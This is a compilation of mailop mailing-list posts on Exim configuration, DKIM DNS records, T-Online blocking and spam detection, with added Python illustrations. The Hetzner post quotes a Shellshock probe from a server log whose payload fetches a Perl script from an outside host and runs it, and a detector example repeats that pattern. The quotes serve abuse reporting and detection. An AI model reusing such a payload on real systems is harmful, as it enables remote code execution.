Re: [mailop] onmicrosoft.com customers forging @microsoft.com addresses for phishing

2024-09-21 Thread Lena--- via mailop
> From: "L. Mark Stone" 

> FWIW, for a while now we have been outright blocking all email from any
> subdomain of onmicrosoft.com

> If anyone has an example of how what we are doing would lead to a false
> positive, I would be grateful to know please.

One of my 3500 customers uses email address @Xzone.onmicrosoft.com
where X is her surname.

SPF include:spf.protection.outlook.com
Received: from mail-cwxgbr01on2110.outbound.protection.outlook.com
DKIM-Signature: ...d=Xzone.onmicrosoft.com
x-forefront-antispam-report: ...;SFV:NSPM;...

___
mailop mailing list
mailop@mailop.org
https://list.mailop.org/listinfo/mailop


Re: [mailop] Plain connections on SubmissionS port

2024-08-12 Thread Lena--- via mailop
> From: Slavko

I'm curious: do you get many legitimate connections to tls_on_connect port 465
(instead of STARTTLS 587)?

Do you tell your users how to use 587, 465 or both?


Re: [mailop] % in SRS ?

2024-03-09 Thread Lena--- via mailop
> You will still run into a fair number of systems that still see % as
> an attempt to do source routing and reject the message.

Including the default Exim config:

https://www.exim.org/exim-html-current/doc/html/spec_html/ch-the_default_configuration_file.html

  deny    domains       = !+local_domains
          local_parts   = ^[./|] : ^.*[@%!] : ^.*/\\.\\./
          message       = Restricted characters in address

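The statement quoted above is what turns a `%` in a local part into a hard rejection at every Exim site running the default ACL. The following added example (mine, not Exim's code or the poster's) re-implements the three `local_parts` patterns as Python regular expressions and runs constructed recipient addresses through them: a standard SRS address, which uses `=` as its separator, passes, while the same information encoded with `%` is refused. The `fwd.example` addresses are made up for the demonstration.

```python
import re

# The three local_parts entries from the Exim default configuration quoted
# above, as anchored regular expressions. A match on any of them means the
# recipient address is refused with "Restricted characters in address".
RESTRICTED_LOCAL_PART_PATTERNS = [
    re.compile(r"^[./|]"),      # leading dot, slash or pipe
    re.compile(r"^.*[@%!]"),    # an @, % or ! anywhere (source-routing syntax)
    re.compile(r"^.*/\.\./"),   # a "/../" path component
]

RESTRICTED_MESSAGE = "Restricted characters in address"


def split_address(address: str):
    """Split an SMTP address into (local_part, domain) at its last '@'.

    Assumption of this example: the address arrives already stripped of the
    angle brackets of the RCPT TO command.
    """
    local_part, sep, domain = address.rpartition("@")
    if not sep:
        raise ValueError(f"no '@' in address: {address!r}")
    return local_part, domain.lower()


def is_restricted_local_part(local_part: str) -> bool:
    """True when any of the default-config patterns matches the local part."""
    return any(p.search(local_part) for p in RESTRICTED_LOCAL_PART_PATTERNS)


def check_recipient(address: str) -> str:
    """Return the verdict the quoted ACL statement would give: 'accept' or 'deny: ...'."""
    local_part, _domain = split_address(address)
    if is_restricted_local_part(local_part):
        return f"deny: {RESTRICTED_MESSAGE}"
    return "accept"


if __name__ == "__main__":
    # Constructed sample recipients: an SRS0 bounce address with '=' separators
    # passes; the same information encoded with '%' is rejected outright.
    for rcpt in ["SRS0=HHH=TT=example.org=user@fwd.example",
                 "user%example.org@fwd.example",
                 ".dotfile@fwd.example",
                 "a/../b@fwd.example"]:
        print(f"{rcpt:45} {check_recipient(rcpt)}")
```

The second pattern is the one that matters for the SRS question: it fires on `%` anywhere in the local part, so no amount of escaping on the forwarder's side helps; the receiving Exim never looks past the ACL.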


Re: [mailop] Dot as the first character of a line ? (RFC 5321, Section 4.5.2)

2024-03-01 Thread Lena--- via mailop
> From: Cyril - ImprovMX

> It turns out that one of their link in the email is broken into multiple
> line (following the RFC on that)

Solution: don't follow the RFC on that, don't break into multiple lines.
If you use Exim then in transports

  driver = smtp
.ifdef _OPT_TRANSPORT_SMTP_MESSAGE_LINELENGTH_LIMIT
  message_linelength_limit = 15000
.endif

All was fine until Exim developers decided to follow RFC on that.

> and surprisingly, the dot from
> "www.domain" was starting as the new line, which gives:

So it turned out that breaking into multiple lines is not as simple
when the break point happens near a dot.

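The dot problem in this thread comes from the interaction of two separate steps: hard-wrapping an over-long line and RFC 5321 section 4.5.2 transparency (a data line starting with `.` is sent with a second `.` in front, and the receiver strips one). The added example below (my code, not Exim's and not the poster's) implements both steps and shows that the order matters: wrapping first and stuffing afterwards keeps the dot, whereas stuffing first and wrapping afterwards lets a split that lands just before the dot in `www.example.org` deliver `wwwexample.org`. The 16-character limit is chosen only to make the split fall at that dot; the body text is constructed.

```python
CRLF = "\r\n"


def wrap_long_lines(body: str, limit: int = 998) -> str:
    """Hard-wrap any line longer than `limit` octets (RFC 5322 allows at most 998).

    The split is purely by length, which is all a transport-level wrapper can
    do: it knows nothing about URLs or where a dot happens to fall.
    """
    out = []
    for line in body.split(CRLF):
        while len(line) > limit:
            out.append(line[:limit])
            line = line[limit:]
        out.append(line)
    return CRLF.join(out)


def dot_stuff(body: str) -> str:
    """Sender side of RFC 5321 4.5.2: a line beginning with '.' gets one more '.'."""
    return CRLF.join("." + ln if ln.startswith(".") else ln for ln in body.split(CRLF))


def dot_unstuff(wire: str) -> str:
    """Receiver side: a line beginning with '.' loses exactly one leading '.'.

    The end-of-data marker (a line consisting of a lone '.') is not modelled.
    """
    return CRLF.join(ln[1:] if ln.startswith(".") else ln for ln in wire.split(CRLF))


def prepare_for_smtp(body: str, limit: int = 998) -> str:
    """Correct order: wrap first, then apply transparency to the wrapped lines."""
    return dot_stuff(wrap_long_lines(body, limit))


def prepare_in_wrong_order(body: str, limit: int = 998) -> str:
    """Buggy order: stuff first, then wrap. A dot pushed to a new line start is never doubled,
    so the receiver's unstuffing eats it."""
    return wrap_long_lines(dot_stuff(body), limit)


if __name__ == "__main__":
    # Constructed sample: with limit=16 the split falls right before the dot
    # in "www.example.org", the situation described in the thread.
    body = "Visit http://www.example.org/"
    print(repr(dot_unstuff(prepare_for_smtp(body, 16))))        # dot survives
    print(repr(dot_unstuff(prepare_in_wrong_order(body, 16))))  # dot is lost
```

Raising `message_linelength_limit`, as the message suggests, sidesteps the problem by never wrapping at all; the example shows what has to hold if wrapping does happen.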


Re: [mailop] Any old-school sendmail types here good with the m4?

2023-08-23 Thread Lena--- via mailop
> I don't know where 
> to buy the brand of LSD that they did at UC Berkeley when they wrote this, 
> in order to make m4 make sense.

They chose incomprehensible m4 in order to coerce you to buy support from them.


Re: [mailop] NS DKIM

2023-03-27 Thread Lena--- via mailop
> That (sub)domain is not DNSSEC signed, thus it will work with
> (many) recursive resolvers for some time. DNSSEC mandates
> NoDATA for empty non terminals, thus there can be problem
> once it become signed (and SW and/or admin will not be
> upgraded).

Okay, I created a TXT record for the parent _domainkey .
Though I'm sure that most other users of such registrar's web-interfaces
wouldn't do that.


[mailop] NS DKIM

2023-03-27 Thread Lena--- via mailop
> If the DNS name xxx._domainkey.example.com exists, then
> _domainkey.example.com exists too.

dig 3._domainkey.lena.kiev.ua txt
3._domainkey.lena.kiev.ua. 66633 IN TXT "v=DKIM1; p=MIGfMA0GCSqGSIb...

dig _domainkey.lena.kiev.ua txt
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 57410

`dig @8.8.8.8` tells the same. `dig +trace 3._dom...` works.


Re: [mailop] mailgun anybody? (variable sender address) time

2023-03-27 Thread Lena--- via mailop
> > > They have SPF, but no DKIM (NXDOMAIN for the _domainkey.bsi.de)
> > > Or did I miss something?
> > 
> > The DKIM keys would be at ._domainkey.bsi.de
> 
> Yes, but as long as the parent of *any* selector does not exist, there
> is a very good chance, that not any selector exists.
> 
> If the query for _domainkey.bsi.de would return a no-data answer, then
> I can assume that they have something below that name (most probably
> selectors I do not know until I get a mail from them.)

For NS I currently use the registrar. Its web-interface allowed me to create
the TXT record for a selector. The parent _domainkey - NXDOMAIN.

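The three messages above (this one, and the two "NS DKIM" posts) are about one DNS concept: `_domainkey.example.com` is an empty non-terminal once `3._domainkey.example.com` exists, so a correct server answers NOERROR with no data (NODATA), not NXDOMAIN. The added example below (mine, not code from the thread) models a tiny constructed zone, a correct authoritative answer, the misbehaving answer seen from the registrar's web DNS, and a resolver that applies RFC 8020 (a cached NXDOMAIN covers every name beneath it). The simulated verifier looks up the parent name first, as someone checking "does this domain publish DKIM at all?" would, and then the selector; `example.com`, its records and the key value are all constructed.

```python
# Constructed zone for example.com: a DKIM selector record exists, but nothing
# is published at the intermediate name _domainkey.example.com itself.
ZONE = {
    "example.com.": {"MX": ["10 mail.example.com."], "TXT": ["v=spf1 mx -all"]},
    "mail.example.com.": {"A": ["192.0.2.25"]},
    "3._domainkey.example.com.": {"TXT": ["v=DKIM1; p=EXAMPLEKEY"]},  # constructed key
}


def _norm(name: str) -> str:
    return name.rstrip(".").lower()


def name_exists(zone: dict, qname: str) -> bool:
    """A name exists if it owns records or is an ancestor of one that does (an empty non-terminal)."""
    q = _norm(qname)
    return any(_norm(o) == q or _norm(o).endswith("." + q) for o in zone)


def authoritative_answer(zone: dict, qname: str, qtype: str):
    """What a correct authoritative server returns: (rcode, rdata)."""
    q = _norm(qname)
    owned = {_norm(o): rrs for o, rrs in zone.items()}
    if q in owned and qtype in owned[q]:
        return ("NOERROR", list(owned[q][qtype]))
    if name_exists(zone, qname):
        return ("NODATA", [])        # NOERROR with an empty answer section
    return ("NXDOMAIN", [])


def naive_answer(zone: dict, qname: str, qtype: str):
    """The misbehaviour described in the thread: NXDOMAIN for any name that owns
    no records, empty non-terminals included."""
    q = _norm(qname)
    owned = {_norm(o): rrs for o, rrs in zone.items()}
    if q in owned:
        return ("NOERROR", list(owned[q][qtype])) if qtype in owned[q] else ("NODATA", [])
    return ("NXDOMAIN", [])


class NxdomainCutResolver:
    """A recursive resolver applying RFC 8020: once a name is known not to exist,
    nothing below it exists either, so those queries are answered from cache."""

    def __init__(self, upstream):
        self.upstream = upstream          # callable (qname, qtype) -> (rcode, rdata)
        self.nonexistent = set()

    def resolve(self, qname: str, qtype: str):
        q = _norm(qname)
        for cut in self.nonexistent:
            if q == cut or q.endswith("." + cut):
                return ("NXDOMAIN", [])   # synthesised, upstream never asked
        rcode, rdata = self.upstream(qname, qtype)
        if rcode == "NXDOMAIN":
            self.nonexistent.add(q)
        return (rcode, rdata)


def dkim_key_visible(answer_func, selector: str, domain: str) -> bool:
    """Simulate a verifier whose resolver saw the parent name before the selector."""
    r = NxdomainCutResolver(answer_func)
    r.resolve(f"_domainkey.{domain}", "TXT")
    rcode, rdata = r.resolve(f"{selector}._domainkey.{domain}", "TXT")
    return rcode == "NOERROR" and any(t.startswith("v=DKIM1") for t in rdata)


if __name__ == "__main__":
    good = lambda n, t: authoritative_answer(ZONE, n, t)
    bad = lambda n, t: naive_answer(ZONE, n, t)
    print("correct server:", dkim_key_visible(good, "3", "example.com"))   # True
    print("NXDOMAIN for ENT:", dkim_key_visible(bad, "3", "example.com"))   # False
```

Whether a given resolver actually applies the RFC 8020 cut to an unsigned zone varies, which is why the quoted reply says the setup "will work ... for some time"; the fix on the page (publishing a TXT record at the parent name) makes the question moot.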


[mailop] Hetzner

2023-02-07 Thread Lena--- via mailop
I emailed abuse()hetzner.com:

=

Your user at 136.243.150.82 hosts malware to exploit a vulnerability in
mail (SMTP) servers. In the log of my Exim:

2023-01-17 00:33:40 +0200 SMTP call from newcloud.thevinylspectrum.com (x) 
[104.200.146.132] dropped: too many syntax or protocol errors (last command was 
"MAIL FROM:<() { :; }; wget -qO - 136.243.150.82/qmx|perl;curl -sS 
136.243.150.82/qmx|perl>",  C=HELO,MAIL)

=

20 days (!) later I received a reply [AbuseID:BEA948:23]:

=

We have received your information regarding spam and/or abuse and we shall 
follow up on this matter.

The person responsible has been sent the following instructions:
- Solve the issue
- Send us a response

=

My conclusion is that Hetzner is a haven for spammers.

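The log line in the message above is the raw material of an abuse report: a Shellshock probe (`() { :; };` in the MAIL FROM argument) whose payload fetches from a second host, the one actually hosting the malware. The added example below (mine, not the poster's script) parses Exim "SMTP call ... dropped" lines, flags the function-definition prefix, and separates the connecting client from the hosts named inside the payload so each can be reported to its own provider. The sample lines are constructed with TEST-NET addresses and are not the ones in the message.

```python
import re

# An Exim main-log line for a dropped SMTP session, in the shape shown above.
EXIM_DROP_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d [+-]\d{4}) "
    r"SMTP call from (?P<host>.+?) \[(?P<ip>[^\]]+)\] dropped: "
    r'.*\(last command was "(?P<cmd>.*)",\s*C=(?P<cmds>[A-Z,]+)\)\s*$'
)
# The shell function-definition prefix that marks a Shellshock probe.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def analyze_line(line: str):
    """Return an abuse-report dict for a Shellshock probe, or None for anything else."""
    m = EXIM_DROP_RE.match(line)
    if not m:
        return None
    cmd = m.group("cmd")
    if not SHELLSHOCK_RE.search(cmd):
        return None
    client_ip = m.group("ip")
    # Hosts the payload would fetch from: report these separately from the
    # (usually also compromised) client that delivered the probe.
    payload_hosts = sorted(set(IPV4_RE.findall(cmd)) - {client_ip})
    return {
        "timestamp": m.group("ts"),
        "client_ip": client_ip,
        "helo": m.group("host"),
        "payload_hosts": payload_hosts,
        "commands_seen": m.group("cmds").split(","),
    }


def scan(lines):
    """Run analyze_line over a log and keep only the hits."""
    return [r for r in map(analyze_line, lines) if r is not None]


# Constructed sample log lines (TEST-NET addresses, not those in the message).
SAMPLE_LOG = [
    "2023-01-17 00:33:40 +0200 SMTP call from newcloud.example.net (x) [198.51.100.23] "
    "dropped: too many syntax or protocol errors (last command was "
    '"MAIL FROM:<() { :; }; wget -qO - 192.0.2.10/qmx|perl>", C=HELO,MAIL)',
    "2023-01-17 00:40:01 +0200 SMTP call from client.example.org [203.0.113.5] "
    "dropped: too many syntax or protocol errors (last command was "
    '"MAIL FROM:<bob@example.org", C=HELO,MAIL)',
]

if __name__ == "__main__":
    for report in scan(SAMPLE_LOG):
        print(report)
```

Only the first sample line is a probe; the second is an ordinary malformed MAIL FROM that Exim dropped for the same "too many syntax or protocol errors" reason, which is why matching on the drop reason alone is not enough.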


Re: [mailop] Opinions.. Layer Host aka Global Frag, Higher level approaches

2022-11-20 Thread Lena--- via mailop
> Just ban *.top, *.xyz, *.club, *.shop, *.buzz, *.work
> 
> Ban it in both rDNS, MFROM and Mime From.

I communicated with 6 honest people with email addresses *.xyz



Re: [mailop] T-Online is now really blocking messages from non-commercial and similar senders

2022-10-20 Thread Lena--- via mailop
> From: Kai 'wusel' Siering 

> > Then a different check:
> 
> I don't speak smail3^Hexim anymore, but I assume it's somewhat similar to
> 
> telnet $mx 25
> if 2xx send quit
> if 5xx set fuckem=1 && send quit || ignore errors
> if $fuckem<1 die in_peace else wreck havoc
> 
> ?

I don't know why, but Exim's ${readsocket works without the "quit":

[root@lena ~]# time exim -be '${readsocket{inet:mx00.t-online.de:25}{}{2s}}!'
220-mailin78.mgt.mul.t-online.de T-Online ESMTP receiver fssmtpd ready.
220 T-Online ESMTP receiver ready.
!

real    0m0.052s
user    0m0.024s
sys     0m0.001s
[root@lena ~]# telnet mx00.t-online.de 25
Trying 194.25.134.8...
Connected to mx00.t-online.de.
Escape character is '^]'.
220-mailin82.mgt.mul.t-online.de T-Online ESMTP receiver fssmtpd ready.
220 T-Online ESMTP receiver ready.
quit
221-2.0.0 mailin82.mgt.mul.t-online.de closing.
221 2.0.0 Closing.
Connection closed by foreign host.
[root@lena ~]#



Re: [mailop] T-Online is now really blocking messages from non-commercial and similar senders

2022-10-20 Thread Lena--- via mailop
> T-Online clearly states in their terms and conditions that they will
> block servers who perform sender verfication towards them.

Then a different check:

 deny condition = ${if or{\
{eqi{$sender_address_domain}{t-online.de}}\
.ifdef _HAVE_LOOKUP_DNSDB
{forany{${lookup dnsdb{>: defer_never,mxh=$sender_address_domain}}}\
   {match{$item}{\N^mx\d+\.t-online\.de$\N}}}\
.endif
   }}
  condition = ${if match{${readsocket{inet:\
.ifdef _HAVE_LOOKUP_DNSDB
${reduce{${lookup dnsdb{>: defer_never,mxh=$sender_address_domain}}}\
{}{$item}}\
.else
mx00.t-online.de\
.endif
:25}{}{2s}}}{^554 IP=}}
  message = We checked that $sender_address_domain blocks us. \
So we do not accept a message we cannot reply to.
# The server admin may change "deny" to "warn" and
# "message =" to "control = fakereject/"
# but few admins will want that (or notice and bother).



Re: [mailop] T-Online is now really blocking messages from non-commercial and similar senders

2022-10-20 Thread Lena--- via mailop
Kai Siering wrote on [mailop]:

> how about starting internal discussions within that community
> to include a default rejection of any mail from @t-online.de
> in Exim's default configuration?

> As nearly no-one who is deploying Exim
> (or Postfix, Sendmail for that matter)
> will be able to *send* to @t-online.de due to their policy,
> it is only logical to not *accept* any mail from them, too.

I propose to include in the default Exim config (in the rcpt ACL)
code which checks whether the server is blocked by t-online.de:

 warn set acl_m_ton = notton
  condition = ${if or{\
{eqi{$sender_address_domain}{t-online.de}}\
.ifdef _HAVE_LOOKUP_DNSDB
{forany{${lookup dnsdb{>: defer_never,mxh=$sender_address_domain}}}\
   {match{$item}{\N^mx\d+\.t-online\.de$\N}}}\
.endif
   }}
  set acl_m_ton = checkdefer
  !verify = sender/callout=10s
  set acl_m_ton = $acl_verify_message

 deny condition = ${if !eq{$acl_m_ton}{notton}}
  condition = ${if !eq{$acl_m_ton}{checkdefer}}
  message = sender verify failed: $acl_m_ton

 deny condition = ${if eq{$acl_m_ton}{checkdefer}}
  message = We checked that $sender_address_domain blocks us. \
So we do not accept a message we cannot reply to.
# The server admin may change "deny" to "warn" and
# "message =" to "control = fakereject/"
# but few admins will want that (or notice and bother).

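The three T-Online messages above share two building blocks: deciding from the sender domain's MX hosts whether the mail comes from T-Online (`^mx\d+\.t-online\.de$`), and reading the SMTP greeting without sending anything (`${readsocket{...}{}{2s}}` with an empty request) to see whether it is a `554 IP=` rejection. The transcript in the latest message shows why no "quit" is needed: the server volunteers its greeting before any command. The added example below (mine, not the ACL code on the page and not Exim's) implements both checks in Python and includes a throwaway loopback SMTP stand-in so the probe can be exercised offline; the greetings it serves are constructed, and `mailin.example.net` and `192.0.2.7` are placeholders.

```python
import io
import re
import socket
import socketserver
import threading

MX_RE = re.compile(r"^mx\d+\.t-online\.de$", re.IGNORECASE)


def is_tonline_mx(mx_hosts) -> bool:
    """The forany/match test from the ACL: does any MX host look like mxNN.t-online.de?"""
    return any(MX_RE.match(h.rstrip(".")) for h in mx_hosts)


def read_greeting(stream) -> str:
    """Consume the SMTP greeting from a binary file object and return it as text.

    Nothing is sent, like ${readsocket{...}{}{2s}}: only the lines the server
    volunteers are read. A reply continues while its 4th character is '-'.
    """
    lines = []
    while True:
        raw = stream.readline()
        if not raw:
            break
        line = raw.decode("latin-1").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            break
    return "\n".join(lines)


def greeting_from_bytes(data: bytes) -> str:
    """Convenience wrapper for captured greetings."""
    return read_greeting(io.BytesIO(data))


def greeting_blocks_us(greeting: str) -> bool:
    """The {^554 IP=} match from the ACL."""
    return re.match(r"^554 IP=", greeting) is not None


def probe_mx(host: str, port: int = 25, timeout: float = 2.0) -> bool:
    """Connect, read only the greeting, and report whether it is a 554 IP= rejection."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return greeting_blocks_us(read_greeting(s.makefile("rb")))


class _GreetingOnlyHandler(socketserver.StreamRequestHandler):
    """Stand-in for an MX: sends its greeting, then waits for the client to go away."""
    banner = b""

    def handle(self):
        self.wfile.write(self.banner)
        self.wfile.flush()
        self.rfile.readline()


def probe_against_fake_mx(banner: bytes) -> bool:
    """Run probe_mx against a loopback server that greets with `banner`."""
    handler = type("Handler", (_GreetingOnlyHandler,), {"banner": banner})
    server = socketserver.TCPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return probe_mx(*server.server_address)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    # Constructed greetings: a two-line welcome like the one in the transcript,
    # and a 554 IP= rejection of the kind the ACL is looking for.
    print(probe_against_fake_mx(
        b"220-mailin.example.net ESMTP receiver ready.\r\n220 ESMTP receiver ready.\r\n"))
    print(probe_against_fake_mx(
        b"554 IP=192.0.2.7 - A problem occurred. (constructed sample)\r\n"))
```

Note the same caveat the ACL carries: the probe is cheap, but it is one TCP connection per incoming message from a T-Online sender, and the reply is acted on without caching.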


Re: [mailop] Looking for contact at iphmx.com

2022-06-29 Thread Lena--- via mailop
> The good folks at SecurityTrails figured out a few months ago that the
> presence of the RoundCube webmail product counts as "phishing against
> the generic brand of email" (I shit you not)

By default RoundCube doesn't include the originating IP in the headers
of outgoing emails. Default means the vast majority of installations.


Re: [mailop] spam filters

2022-01-25 Thread Lena--- via mailop
> From: "Sebastian Nielsen" 

> for example *.xyz is a big spam hole... Don't know why spammers love
> that TLD, but 99.99 % from that TLD is spam. Would want to see *.xyz
> eradicated from the whole internet...

I communicated with 6 honest people with email addresses *.xyz



Re: [mailop] [E] Re: What am I supposed to do with abuse complaints on legit mail?

2022-01-15 Thread Lena--- via mailop
> From: Marcel Becker 

> We only send FBL/CFL reports if the user actually hits the "Report as Spam"
> button in our apps.

In the past yahoo sent FBL when the user deleted a message from the Spam folder,
including "delete everything". Maybe even when messages expired.
I'd not be surprised if this behavior continues.


Re: [mailop] Google Postmaster Tools - No data since October 4th

2021-10-14 Thread Lena--- via mailop
> From: Jaroslaw Rafa 

> "low reputation of the sending domain"

I'm afraid that it'll be the same for any free domain name
(because of abuse by spammers). Unfair, yes.

But possibly the content of your emails causes Gmail users to click "Spam"
more often than average user stupidity does.
Or you pissed off one Gmail user, and now he clicks "Spam" on every one of your emails.
Or he always deletes everybody's emails with the Spam button.

Influence of IP block or AS reputation is also possible,
despite the text of the error message.


Re: [mailop] How to detect fraud login in POP IMAP or SMTP?

2021-09-21 Thread Lena--- via mailop
> From: Alessio Cecchi 

> we are an email hosting provider, and as you know many users use weak 
> passwords, or have trojan on their PC that stolen their password that 
> are used to sent spam or doing some kinds of fraud.
> 
> We already have a "script" that checks, from log files, the country of 
> the IP address and "do something" to detect if is an unusual login. But 
> is not really sufficient.

I suspect that stealing passwords with trojans is more successful
than brute-forcing passwords via POP, IMAP or SMTP.
Therefore, detecting logins for brute-forcing is not enough.
You need to detect when stolen passwords are used to send spam
via your server. One approach is to check the rate of attempts to send
to non-existent recipient email addresses, because spammers usually
send to dirty lists of email addresses full of message-ids,
truncated email addresses or ones prepended with garbage.
I wrote an implementation for Exim:
https://github.com/Exim/exim/wiki/BlockCracking
It also detects some brute-forcing, but the main purpose is automatic blocking
of accounts used for spamming with trojan-stolen passwords.

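The detection idea in the message above (rate of submissions to non-existent recipients per authenticated login) is simple enough to show end to end. The added example below is my illustration of that approach, not the BlockCracking code from the linked wiki page: it parses Exim-style "rejected RCPT" log lines carrying an `A=<authenticator>:<login>` field, keeps a sliding window of rejections per login, and reports a login once it exceeds a threshold. Where BlockCracking writes the login to a file Exim consults, this example only records it in a set. The log lines, the `dovecot_login` authenticator name, the logins and the recipients are all constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# An Exim main-log line for a recipient rejected during an authenticated
# submission. The A= field carries <authenticator>:<login>.
REJECTED_RCPT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) .*? A=\S+?:(?P<login>\S+) "
    r".*?rejected RCPT <(?P<rcpt>[^>]*)>: (?P<reason>.*)$"
)


class CompromisedAccountDetector:
    """Count recipient rejections per authenticated login in a sliding window.

    A legitimate user mistypes an address now and then; a spam run driven by a
    stolen password hits unknown recipients in bursts.
    """

    def __init__(self, threshold: int = 5, window: timedelta = timedelta(hours=1)):
        self.threshold = threshold
        self.window = window
        self.rejections = defaultdict(deque)   # login -> timestamps inside the window
        self.blocked = set()

    def feed(self, line: str):
        """Feed one log line; return the login if this line trips the threshold."""
        m = REJECTED_RCPT_RE.match(line)
        if not m:
            return None                        # unauthenticated or unrelated line
        login = m.group("login")
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
        q = self.rejections[login]
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()
        if len(q) >= self.threshold and login not in self.blocked:
            self.blocked.add(login)            # a deployment would also refuse further AUTH
            return login
        return None

    def process(self, lines):
        """Return the logins blocked while reading `lines`, in order."""
        return [login for login in map(self.feed, lines) if login]


def _line(ts: str, login: str, rcpt: str) -> str:
    """Build a constructed log line in the Exim shape above."""
    return (f"{ts} H=(win-pc) [203.0.113.9] A=dovecot_login:{login} "
            f"F=<{login}> rejected RCPT <{rcpt}>: Unrouteable address")


# Constructed sample: one login burning through a dirty list in eight minutes
# (message-id-like and truncated recipients), one legitimate typo, and one
# unauthenticated rejection that must be ignored.
SAMPLE_LOG = [
    _line("2021-09-21 10:00:01", "alice@example.com", "1234567890@example.net"),
    _line("2021-09-21 10:01:12", "alice@example.com", "CAE3f9k@mail.example.net"),
    _line("2021-09-21 10:02:30", "bob@example.com", "colleague@exmaple.org"),
    _line("2021-09-21 10:03:05", "alice@example.com", "jo@example.orgx"),
    _line("2021-09-21 10:05:44", "alice@example.com", "xyz.john@example.n"),
    "2021-09-21 10:06:00 H=(spammer) [198.51.100.7] F=<x@example.org> "
    "rejected RCPT <nobody@example.com>: Unknown user",
    _line("2021-09-21 10:07:59", "alice@example.com", "ab@@example.net"),
]

if __name__ == "__main__":
    detector = CompromisedAccountDetector()
    print(detector.process(SAMPLE_LOG))        # ['alice@example.com']
```

Threshold and window are the tuning knobs: too low and a user with a stale address book is locked out, too high and a fast spam run finishes before detection. The window-based count also catches a slow-drip sender that a per-session limit would miss.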


Re: [mailop] mail.ru broke mailing lists

2021-07-12 Thread Lena--- via mailop
> My guess is that the solution is to have your mailing list software
> (groups.io) use the mailing list address in the 5322.From
> (like how this list works)

No, I'll tell list members to ditch mail.ru
and use Gmail or @yandex.ru instead (with more reasonable policies).

Unless the mail.ru admin on this list understands the problem
and doesn't try to tell every mailing list admin in the world
to conform to his whims.

The groups.io admin already rewrites "From:" for domains with DMARC p=reject.
I don't want him to mangle every "From:".



[mailop] mail.ru broke mailing lists

2021-07-12 Thread Lena--- via mailop
According to Юлия П. in Abuse Team Mail.ru,
they'll not change their new unannounced policy:
messages from mailing lists (at groups.io) from authors @yandex.ru
are rejected by mail.ru though DMARC for yandex.ru is p=none.

Thus, mail.ru became unusable for all people who participate
in discussion mailing lists.

Below are my futile attempts to explain (bottom-quoting required by them).

=

Subject: Re: [Ticket#2021071021014077] My emails are being treated as spam
Date: Mon, 12 Jul 2021 11:54:08 +0300
To: l...@lena.kiev.ua
From: "ab...@corp.mail.ru" 

Hello.

The reason for the blocking was given earlier; every mail provider is entitled
to use its own metrics for its anti-spam system.
The blocking of messages that arrive without authorization on the corresponding
servers will not be lifted; this logic cannot be changed.

--
Best regards,
Юлия П.
Abuse Team Mail.ru


> The yandex.ru domain has the DMARC policy "p=none" precisely so as not to
> break mailing lists. Therefore in this case mail.ru has no right to
> reject messages on DMARC grounds.
> 
> mail.ru would have the right to reject messages if yandex.ru had written
> "p=reject".
> But yandex did not do that. Deliberately, so that discussion mailing lists
> could keep working.
> 
> I hope that today a more competent employee is on the mail.ru support
> shift.
> 
> ~ $ dig +short _dmarc.yandex.ru txt
> "v=DMARC1; p=none; fo=1;
> rua=mailto:dmarc_...@auth.returnpath.net,mailto:dmarc-...@yandex.ru;
> ruf=mailto:dmarc_a...@auth.returnpath.net";
> ~ $
> 
> > To repeat: SPF in your messages does indeed pass the check, but because
> > From and envelope-from do not match, such messages are technically
> > considered spoofed with respect to the domain given in From, the address
> > visible to the recipient, by analogy with the effect of a DMARC policy:
> > https://tools.ietf.org/html/rfc7489
> > 
> > To resolve the issue you can use a different setup, with an address in
> > your own domain as the sender instead of keeping/substituting the
> > client's address. In that case the messages will pass the spam filters.
> > 
> > --
> > Best regards,
> > Юлия П.
> > Abuse Team Mail.ru
> > 
> > 
> > > You do not understand how SPF and a discussion mailing list work.
> > > You have probably never even used them.
> > > List members send messages to the list address
> > > (in this case tg...@groups.io), and the list server
> > > distributes copies to all list members. The "From:" header line
> > > keeps (does not substitute, but keeps!) the address of the message's author
> > > (in this case @yandex.ru),
> > > while in the envelope-from (Return-Path) the list server puts an
> > > @groups.io address.
> > > I did not invent this; list servers have been in use since 1984.
> > > The SPF check must be done on the envelope-from, not on "From:".
> > > You do not understand what envelope-from is.
> > > You press the first button that comes to hand without understanding the problem.
> > > Please pass this correspondence to specialists.
> > > 
> > > > We understand how SPF works and for which domain it is checked. The
> > > > point is not that SPF is invalid as such, but that the messages are
> > > > in fact sent from one set of servers while a completely different
> > > > mailbox provider's domain is substituted as the sender. If you cannot
> > > > provide authorization directly for yandex.ru when sending messages
> > > > purportedly from it, we recommend using a From matching your own domain.
> > > > 
> > > > --
> > > > Best regards,
> > > > Юлия П.
> > > > Abuse Team Mail.ru
> > > > 
> > > > 
> > > > > Support employee Юлия П. does not read, and pokes buttons at random.
> > > > > 
> > > > > > The message whose blocking you asked about was sent from yandex.ru
> > > > > > without authorization on their servers (it did not pass the
> > > > > > SPF/DKIM check). More about these settings can be found here:
> > > > > > https://help.mail.ru/postmaster/technical-settings/notes
> > > > > > 
> > > > > > If you want to send messages from a yandex.ru mailbox, they must
> > > > > > arrive with authorization on Yandex's servers accordingly. If
> > > > > > SPF/DKIM validity for yandex.ru cannot be ensured, use an address in
> > > > > > your own domain as the sender. We remind you of the need to
> > > > > > implement SPF, DKIM and DMARC for it before sending messages.
> > > > > > 
> > > > > > --
> > > > > > Best regards,
> > > > > > Юлия П.
> > > > > > Abuse Team Mail.ru
> > > > > > 
> > > > > > Did this answer help you?
> > > > > > >  All topics, My emails are being treated as spam 
> > > > > > > 
> > > > > > > 
> > > > > > > I am the moderator of an email discussion list on the
> > > > > > > groups.io server. This server uses only two IP addresses,
> > > > > > > 66.175.222.12 and
> > > > > > > 66.175.222.108, to send mail from many thousands of
